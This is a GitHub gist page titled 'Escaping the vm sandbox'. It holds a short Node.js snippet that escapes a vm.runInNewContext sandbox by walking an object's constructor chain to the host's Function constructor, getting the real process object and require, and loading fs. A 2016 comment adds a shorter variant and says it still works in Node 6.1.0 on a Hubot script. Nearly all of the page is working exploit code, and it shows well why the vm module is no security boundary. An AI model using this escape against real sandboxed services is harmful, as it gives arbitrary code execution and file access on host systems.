Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Escaping the vm sandbox
"use strict";
const vm = require("vm");
const sandbox = { anObject: {} };
const whatIsThis = vm.runInNewContext(`
const ForeignObject = anObject.constructor;
const ForeignFunction = ForeignObject.constructor;
const process = ForeignFunction("return process")();
const require = process.mainModule.require;
require("fs");
`, sandbox);

NiXXeD commented May 13, 2016 edited

Technically you can also just do:
const ForeignFunction = this.constructor.constructor;
since the context object itself is created in the context you want. You don't even need a foreign object.

Also, this still appears to be an issue in Node 6.1.0. Just tested this for a silly Hubot script we have.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment